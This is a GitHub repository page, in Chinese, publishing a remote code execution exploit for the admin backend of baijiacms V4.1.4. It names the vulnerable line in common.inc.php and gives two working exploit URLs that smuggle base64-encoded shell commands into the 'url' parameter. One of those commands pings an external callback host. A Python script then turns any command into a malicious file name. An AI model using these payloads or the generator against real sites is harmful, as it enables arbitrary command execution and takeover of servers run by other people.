Skip to content

This-is-Y/baijiacms-RCE

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

baijiacms-RCE

baijiacms后台RCE

项目地址:https://github.com/baijiacms/baijiacmsV4

版本:V4.1.4 20170105 FINAL 环境:

  • php 5.5.38
  • nginx 1.15
  • mysql 5.7.27
  • 20.04.1-Ubuntu

README_en

漏洞点在文件includes/baijiacms/common.inc.php 第654行。

图片

利用

这个system的功能本来是为了执行压缩图片的。所以要利用该漏洞,需要先登录后台,在附近设置中设置图片压缩比例,否则代码无法运行到此处。 图片

EXP1:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==|base64${IFS}-d|bash;&status=1&beid=1 图片

EXP2:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1 图片

其中poc可以使用一下代码生成,随后开启web服务确保可以被访问到即可

import base64

webpath = "/home/ubuntu/test/"
cmd = input("cmd>>> ") 


b64cmd = base64.b64encode(cmd.encode()).decode()

payload = f"echo {b64cmd}|base64 -d|bash"

print(payload)
payload = payload.replace(' ','${IFS}')
print(payload)

name = input("name>>>")
payload = f"{name}.;{payload};"
print(payload)

with open(file=webpath+payload,mode='w')as f:
    f.write('1')

About

baijiacms后台RCE

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published